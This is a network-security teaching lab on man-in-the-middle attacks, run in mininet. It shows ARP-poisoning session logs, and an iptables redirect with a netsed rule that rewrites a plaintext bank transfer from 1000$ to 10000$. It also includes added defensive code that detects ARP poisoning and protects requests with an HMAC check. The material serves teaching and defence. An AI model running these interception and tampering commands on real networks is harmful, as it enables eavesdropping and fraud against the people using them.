# Man In The Middle (MIM)

A man-in-the-middle attack is a type of cyberattack where a malicious actor inserts him/herself into a conversation between two parties, impersonates both parties and gains access to information that the two parties were trying to send to each other. A man-in-the-middle attack allows a malicious actor to intercept, send and receive data meant for someone else, or not meant to be sent at all, without either outside party knowing until it is too late. Man-in-the-middle attacks can be abbreviated in many ways, including MITM, MitM, MiM or MIM. [[1]](https://www.veracode.com/security/man-middle-attack)

The remainder of this lab is organized as follows: Section 1 reviews MIM. Section 2 gives a thorough explanation of how network flow can be intercepted and of related aspects of the MIM attack. Section 3 shows how an attacker can modify HTTP requests (or any unencrypted packets) after intercepting the network flow. In Section 4, Alice and Bob use Diffie–Hellman to exchange secret keys, and Eve exploits a deficiency of this algorithm to break their secure communication. Finally, Section 5 presents a fun example.

In each section we implement a small sample to further illustrate the material.

## Table of Contents
1. [How does a man-in-the-middle attack work?](#1.-How-does-a-man-in-the-middle-attack-work%3F)
2. [Intercept Network Flow](#2.-Intercept-Network-Flow)
3. [Modify HTTP requests](#3.-Modify-HTTP-requests)

## 1. How does a man-in-the-middle attack work? [[1]](https://us.norton.com/internetsecurity-wifi-what-is-a-man-in-the-middle-attack.html)

How does this play out? Let’s say you received an email that appeared to be from your bank, asking you to log in to your account to confirm your contact information. You click on a link in the email and are taken to what appears to be your bank’s website, where you log in and perform the requested task.

In such a scenario, the man in the middle (MITM) sent you the email, making it appear to be legitimate. (This attack also involves phishing, getting you to click on the email appearing to come from your bank.) He also created a website that looks just like your bank’s website, so you wouldn’t hesitate to enter your login credentials after clicking the link in the email. But when you do that, you’re not logging into your bank account, you’re handing over your credentials to the attacker.

### MITM attacks: Close to you or with malware

Man-in-the-middle attacks come in two forms, one that involves physical proximity to the intended target, and another that involves malicious software, or malware. This second form, like our fake bank example above, is also called a man-in-the-browser attack.

Cybercriminals typically execute a man-in-the-middle attack in two phases — interception and decryption.

With a traditional MITM attack, the cybercriminal needs to gain access to an unsecured or poorly secured Wi-Fi router. These types of connections are generally found in public areas with free Wi-Fi hotspots, and even in some people’s homes, if they haven’t protected their network. Attackers can scan the router looking for specific vulnerabilities such as a weak password.

Once attackers find a vulnerable router, they can deploy tools to intercept and read the victim’s transmitted data. The attacker can then also insert their tools between the victim’s computer and the websites the user visits to capture log in credentials, banking information, and other personal information.

A successful man-in-the-middle attack does not stop at interception. The victim’s encrypted data must then be unencrypted, so that the attacker can read and act upon it.

### What is a man-in-the-browser attack?

With a man-in-the-browser attack (MITB), an attacker needs a way to inject malicious software, or malware, into the victim’s computer or mobile device. One of the ways this can be achieved is by phishing.

Phishing is when a fraudster sends an email or text message to a user that appears to originate from trusted source, such as a bank, as in our original example. By clicking on a link or opening an attachment in the phishing message, the user can unwittingly load malware onto their device.

The malware then installs itself on the browser without the user’s knowledge. The malware records the data sent between the victim and specific targeted websites, such as financial institutions, and transmits it to the attacker.

## 2. Intercept Network Flow

In the first step of a **Man In The Middle attack**, the attacker (Eve) intercepts the victim's (Bob's) traffic so that it passes through the attacker's host before it reaches its intended destination. The attacker (Eve) may launch one of the following attacks to reach this goal:

**IP spoofing:** involves an attacker disguising himself as an application by altering packet headers in an IP address. As a result, users attempting to access a URL connected to the application are sent to the attacker’s website. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

**ARP spoofing:** also known as ARP Poisoning is the process of linking an attacker’s MAC address with the IP address of a legitimate user on a local area network using fake ARP messages. As a result, data sent by the user to the host IP address is instead transmitted to the attacker. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

**DNS spoofing:** also known as DNS cache poisoning, involves infiltrating a DNS server and altering a website’s address record. As a result, users attempting to access the site are sent by the altered DNS record to the attacker’s site. [[1]](https://www.imperva.com/learn/application-security/man-in-the-middle-attack-mitm/?utm_campaign=Incapsula-moved)

In this exercise we use the ARP Poisoning technique to intercept the network flow from Bob to Alice.

### ARP Poisoning

ARP Poisoning is a type of attack in which a malicious actor sends falsified ARP (Address Resolution Protocol) messages over a local area network. This results in the linking of an attacker’s MAC address with the IP address of a server on the network. Once the attacker’s MAC address is connected to an authentic IP address, the attacker will begin receiving any data that is intended for that IP address. ARP poisoning can enable malicious parties to intercept, modify or even stop data in transit. ARP spoofing attacks can only occur on local area networks that utilize the Address Resolution Protocol. [[2]](https://www.veracode.com/security/arp-spoofing)

This scenario is illustrated in the pictures below. (These images were created with [Creatly](https://creatly.com).)

|                                                |                             |
|:----------------------------------------------:|:---------------------------:|
|![](./img/1-initial-setup.png)                  |![](./img/2-send-ARP.png)    |
|![](./img/3-poisoned-tables.png)                |![](./img/4-packets-flow.png)|

#### Exercise One, ARP Poisoning

**Note:** $\color{blue}{\text{(T)}}$ at the end of a step means you need that step's output to complete your lab report; don't forget to take a screenshot.

1. Run the script below and wait until the mininet console shows up.
2. Run $\color{#1E90FF}{\text{`bob arp -a`}}$ and $\color{#1E90FF}{\text{`alice arp -a`}}$ in the mininet console to check the ARP table entries on the Bob and Alice hosts. (Nothing will show up if the table is empty.)
3. Ping the Alice host from Bob to fill the ARP table. $\color{#03C03C}{\text{Hint: run}}$ $\color{#177245}{\text{`bob ping alice -c 3`}}$
4. Check the ARP tables again. $\color{blue}{\text{(T)}}$ $\color{#03C03C}{\text{Hint: Repeat step two.}}$
5. Run $\color{#1E90FF}{\text{`eve python arp-poison.py &`}}$ to poison Alice and Bob.
6. Check the ARP tables again. $\color{blue}{\text{(T)}}$ $\color{#03C03C}{\text{Hint: Repeat step two.}}$
7. Open the Scapy module in a separate window and run the **Exercise One, ARP Poison** cell to capture the ping packets.
8. Ping the Alice host from Bob. $\color{#03C03C}{\text{Hint: Repeat step three.}}$
9. Check the Scapy output and save it for your lab report. $\color{blue}{\text{(T)}}$

#### Lab report

* Explain the ARP Poisoning attack and justify your answer with the Scapy output.
* Attach the ARP tables to your lab report.
* Why does the Scapy output show two **Echo Request** packets followed by two **Echo Reply** packets, rather than one **Echo Request** with one **Echo Reply**?
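The lab asks you to read the poisoning off the ARP tables and the Scapy capture by hand. The following added example (my own code, not part of the lab files and not the `arp-poison.py` or Scapy code the lab ships) turns the same observations into checks a defender can run: it parses `arp -a` output in the net-tools format the mininet session below prints, flags any MAC that answers for more than one IP, compares the current table against a baseline recorded before the attack, and reads the reply TTL out of `ping` output, because a host that forwards the packets in the path decrements it. The sample strings are copied from this lab's session; the baseline idea, the function names and the expected TTL of 64 are my assumptions.

```python
import re
from collections import defaultdict

# Constructed samples: `arp -a` and `ping` lines copied from this lab's mininet
# session, so the checks run offline against the values the lab produces.
BOB_ARP_BEFORE = "? (10.0.0.1) at 00:00:00:00:00:01 [ether] on bob-eth0"
BOB_ARP_AFTER = (
    "? (10.0.0.2) at 00:00:00:00:00:02 [ether] on bob-eth0\n"
    "? (10.0.0.1) at 00:00:00:00:00:02 [ether] on bob-eth0"
)
PING_BEFORE = "64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=2.28 ms"
PING_AFTER = "64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=5.93 ms"

# Linux net-tools `arp -a` line: "? (10.0.0.1) at 00:00:00:00:00:01 [ether] on bob-eth0"
ARP_LINE = re.compile(
    r"\((?P<ip>\d+\.\d+\.\d+\.\d+)\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})", re.I
)
PING_TTL = re.compile(r"icmp_seq=\d+ ttl=(\d+)")


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output; MACs are lower-cased for comparison."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group("ip")] = m.group("mac").lower()
    return table


def duplicate_macs(table):
    """MACs that claim more than one IP: the footprint of a poisoned ARP cache."""
    by_mac = defaultdict(set)
    for ip, mac in table.items():
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_bindings(baseline, current):
    """IPs whose MAC differs from a trusted baseline (e.g. the table recorded before step 5)."""
    return {
        ip: (baseline[ip], current[ip])
        for ip in baseline
        if ip in current and current[ip] != baseline[ip]
    }


def ttl_dropped(ping_output, expected_ttl=64):
    """True if any reply TTL is below what a directly attached host would send.

    Assumption: Linux hosts send with TTL 64 (measure your own baseline), so a
    reply at 63 from a neighbour on the same switch crossed one extra forwarding hop.
    """
    ttls = [int(t) for t in PING_TTL.findall(ping_output)]
    return bool(ttls) and min(ttls) < expected_ttl


def arp_report(baseline_text, current_text, ping_output):
    """Combine the three checks into one verdict dict for a host."""
    baseline, current = parse_arp_table(baseline_text), parse_arp_table(current_text)
    return {
        "duplicate_macs": duplicate_macs(current),
        "changed_bindings": changed_bindings(baseline, current),
        "ttl_dropped": ttl_dropped(ping_output),
    }


if __name__ == "__main__":
    print("before:", arp_report(BOB_ARP_BEFORE, BOB_ARP_BEFORE, PING_BEFORE))
    print("after: ", arp_report(BOB_ARP_BEFORE, BOB_ARP_AFTER, PING_AFTER))
```

Run it after step 6 of the exercise with your own `arp -a` output pasted in place of the constructed strings: a single MAC bound to both 10.0.0.1 and 10.0.0.2 on Bob is the poisoned state the lab's screenshots should show. A host-based check like this is only as good as its baseline; on a real network the durable mitigations are static ARP entries for critical hosts, dynamic ARP inspection on the switch, and end-to-end encryption so that a forwarding host gains nothing from the traffic it sees.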

```python
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("alice", mac='00:00:00:00:00:01', ip='10.0.0.1')
topo.addHost("eve", mac='00:00:00:00:00:02', ip='10.0.0.2')
topo.addHost("bob", mac='00:00:00:00:00:03', ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("alice", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

CLI(net)  # Bring up the mininet CLI

net.stop()
```

```text
mininet>  alice arp -a
mininet>  bob arp -a
mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=64 time=2.28 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=64 time=0.280 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=64 time=0.068 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=64 time=0.138 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=64 time=0.056 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4073ms
rtt min/avg/max/mdev = 0.056/0.566/2.288/0.864 ms

mininet>  alice arp -a

? (10.0.0.3) at 00:00:00:00:00:03 [ether] on alice-eth0

mininet>  bob arp -a

? (10.0.0.1) at 00:00:00:00:00:01 [ether] on bob-eth0

mininet>  eve python arp-poison.py &

[1] 2158

mininet>  alice arp -a

? (10.0.0.3) at 00:00:00:00:00:02 [ether] on alice-eth0
? (10.0.0.2) at 00:00:00:00:00:02 [ether] on alice-eth0

mininet>  bob arp -a

? (10.0.0.2) at 00:00:00:00:00:02 [ether] on bob-eth0
? (10.0.0.1) at 00:00:00:00:00:02 [ether] on bob-eth0

mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=5.93 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.578 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.096 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.078 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.071 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4040ms
rtt min/avg/max/mdev = 0.071/1.352/5.938/2.301 ms

mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=0.542 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.081 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.084 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.080 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.098 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4037ms
rtt min/avg/max/mdev = 0.080/0.177/0.542/0.182 ms

mininet>  eve ls

[*] Starting script: arp_poison.py
[*] Enabling IP forwarding
sysctl: cannot stat /proc/sys/net/inet/ip/forwarding: No such file or directory
0
[*] Gateway IP address: set(['10.0.0.1'])
[*] Target IP address: set(['10.0.0.3'])
[*] Gateway MAC address: set(['00:00:00:00:00:01'])
[*] Target MAC address: set(['00:00:00:00:00:03'])
[*] Started ARP poison attack [CTRL-C to stop]
 [*] Starting network capture. Packet Count: set([1000]). Filter: set(['icmp or ip host 10.0.0.3'])
RUNME.ipynb    devile.jpg	img	      web-server.ipynb
Scapy.ipynb    get_image.ipynb	response.jpg  web-server.py
arp-poison.py  get_image.py	response.txt

mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=3.57 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.568 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.194 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.079 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.083 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4047ms
rtt min/avg/max/mdev = 0.079/0.900/3.577/1.350 ms

mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=0.718 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.102 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.108 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.098 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.081 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4030ms
rtt min/avg/max/mdev = 0.081/0.221/0.718/0.248 ms

mininet>  bob ping alice -c 5

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=3.68 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.597 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.067 ms
64 bytes from 10.0.0.1: icmp_seq=4 ttl=63 time=0.085 ms
64 bytes from 10.0.0.1: icmp_seq=5 ttl=63 time=0.139 ms

--- 10.0.0.1 ping statistics ---
5 packets transmitted, 5 received, 0% packet loss, time 4004ms
rtt min/avg/max/mdev = 0.067/0.915/3.688/1.400 ms

mininet>  bob ping alice -c 3

PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.
64 bytes from 10.0.0.1: icmp_seq=1 ttl=63 time=4.64 ms
64 bytes from 10.0.0.1: icmp_seq=2 ttl=63 time=0.441 ms
64 bytes from 10.0.0.1: icmp_seq=3 ttl=63 time=0.087 ms

--- 10.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2002ms
rtt min/avg/max/mdev = 0.087/1.723/4.641/2.068 ms
```

## 3. Modify HTTP requests

https://serverfault.com/questions/318960/easy-way-to-edit-the-traffic-coming-from-a-tcp-host-linux
https://blog.wains.be/2016/2016-03-17-netsed-stream-editor/

1. `bob python set_password.py bank 1234`
2. `bob python transfer.py bank 1000$ 1234`
3. `eve python arp-poison.py &`

```python
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("bank", mac='00:00:00:00:00:01', ip='10.0.0.1')
topo.addHost("eve", mac='00:00:00:00:00:02', ip='10.0.0.2')
topo.addHost("bob", mac='00:00:00:00:00:03', ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("bank", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

# Run bank web server
net.get("bank").cmd("python web-server.py &")

CLI(net)  # Bring up the mininet CLI

net.stop()
```

```text
mininet>  bob python set_password.py bank 1234

Password was set.

mininet>  eve python arp-poison.py &

[1] 11531

mininet>  eve iptables -t nat -D PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101

[*] Starting script: arp_poison.py
[*] Enabling IP forwarding
sysctl: cannot stat /proc/sys/net/inet/ip/forwarding: No such file or directory
0
[*] Gateway IP address: set(['10.0.0.1'])
[*] Target IP address: set(['10.0.0.3'])
[*] Gateway MAC address: set(['00:00:00:00:00:01'])
[*] Target MAC address: set(['00:00:00:00:00:03'])
[*] Started ARP poison attack [CTRL-C to stop]
 [*] Starting network capture. Packet Count: set([10]). Filter: set(['icmp or ip host 10.0.0.3'])
iptables: No chain/target/match by that name.

mininet>  eve netsed tcp 10101 10.0.0.1 80 s/00$/000$

netsed 1.2 by Julien VdG <julien@silicone.homelinux.org>
      based on 0.01c from Michal Zalewski <lcamtuf@ids.pl>
[*] Parsing rule s/00$/000$...
[+] Loaded 1 rule...
[+] Using fixed forwarding to 10.0.0.1,80.
[+] Listening on port 10101/tcp.

mininet>  eve iptables -t nat -D PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101

iptables: No chain/target/match by that name.

mininet>  eve iptables -t nat -A PREROUTING -s 10.0.0.3 -d 10.0.0.1 -p tcp --dport 80 -j REDIRECT --to 10101
mininet>  eve netsed tcp 10101 10.0.0.1 80 s/00$/000$ &
mininet>  bob python transfer.py bank 1000$ 1234

Transfered 10000$ successfully.
```
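The session above shows the core weakness this section demonstrates: the transfer request travels as plaintext with nothing binding its content to the sender, so a stream editor on the path rewrote `1000$` into `10000$` and the bank accepted it. The following added example is my own code, not the lab's `transfer.py` or `web-server.py` (neither is shown on this page). It models the same request with an HMAC-SHA256 tag computed over the body under a key that Bob and the bank are assumed to share, and a bank-side handler that rejects both a tampered body and a replayed copy of a valid one. The `netsed_rewrite` helper reproduces the lab's rule `s/00$/000$` as the literal substring substitution the session's result shows it to be. The shared key, the field layout and the nonce are constructed values.

```python
import hashlib
import hmac
import secrets

# Constructed demo key: in practice derived at enrollment and never sent on the wire.
SHARED_KEY = b"constructed-demo-key-not-from-the-lab"


def build_request(amount, password, key=SHARED_KEY, nonce=None):
    """Client side: build the transfer body and an HMAC-SHA256 tag over it.

    The body mirrors the lab's transfer.py arguments (amount, password); the
    nonce lets the bank reject a replayed copy of a request it already accepted.
    """
    nonce = nonce or secrets.token_hex(8)
    body = f"amount={amount}&password={password}&nonce={nonce}"
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body, tag


def verify_request(body, tag, key=SHARED_KEY):
    """Bank side: recompute the tag over what actually arrived; constant-time compare."""
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, tag)


def netsed_rewrite(body, pattern="00$", replacement="000$"):
    """Model of the lab's netsed rule s/00$/000$: a literal substring substitution
    on the TCP stream (the '$' is data, not a regex anchor, as '1000$' -> '10000$' shows)."""
    return body.replace(pattern, replacement)


def parse_body(body):
    """Split 'k=v&k=v' into a dict."""
    return dict(field.split("=", 1) for field in body.split("&"))


def handle_transfer(body, tag, seen_nonces, key=SHARED_KEY):
    """Bank side: reject bad tags and replays, otherwise 'transfer' the amount.

    seen_nonces is a set the caller keeps across requests (constructed state).
    Returns a status string so the outcome can be checked.
    """
    if not verify_request(body, tag, key):
        return "rejected: integrity check failed"
    fields = parse_body(body)
    if fields["nonce"] in seen_nonces:
        return "rejected: replayed request"
    seen_nonces.add(fields["nonce"])
    return f"ok: transferred {fields['amount']}"


if __name__ == "__main__":
    seen = set()
    body, tag = build_request("1000$", "1234")
    print("on the wire:", body)
    print(handle_transfer(body, tag, seen))        # ok: transferred 1000$
    tampered = netsed_rewrite(body)
    print("after netsed:", tampered)
    print(handle_transfer(tampered, tag, seen))    # rejected: integrity check failed
    print(handle_transfer(body, tag, seen))        # rejected: replayed request
```

The tag protects integrity only: the password is still readable by anyone on the path, and the attacker can still drop the request. That is why the practical fix for the scenario in this section is TLS, which gives confidentiality and integrity for the whole stream and lets the client authenticate the bank; an application-level MAC like the one above is what you add when the transport cannot be trusted end to end.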


```python
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink  # So we can rate limit links
from mininet.cli import CLI  # So we can bring up the Mininet CLI
from mininet.clean import cleanup

cleanup()

topo = Topo()  # Create an empty topology

# Add switches and hosts to the topology
topo.addSwitch("s1")
topo.addHost("bank", mac='00:00:00:00:00:01', ip='10.0.0.1')
topo.addHost("eve", mac='00:00:00:00:00:02', ip='10.0.0.2')
topo.addHost("bob", mac='00:00:00:00:00:03', ip='10.0.0.3')

# Wire the switches and hosts together
topo.addLink("bank", "s1")
topo.addLink("eve", "s1")
topo.addLink("bob", "s1")

net = Mininet(topo=topo, link=TCLink)
net.start()

# Run bank web server
net.get("bank").cmd("python web-server.py &")
net.get("bob").cmd("python set_password.py 10.0.0.1 1234")
net.get("eve").cmd("python arp-poison.py &")
net.get("eve").cmd("iptables -A FORWARD -p tcp -j NFQUEUE --queue-num 0")
net.get("eve").cmd("python test.py > out.txt &")

CLI(net)  # Bring up the mininet CLI

net.stop()
```

```text
mininet>  bob python transfer.py bank 1000$ 1234

Transfered 1000$ successfully.

mininet>  bob python transfer.py bank 1000$ 1234

Transfered 1000$ successfully.
```
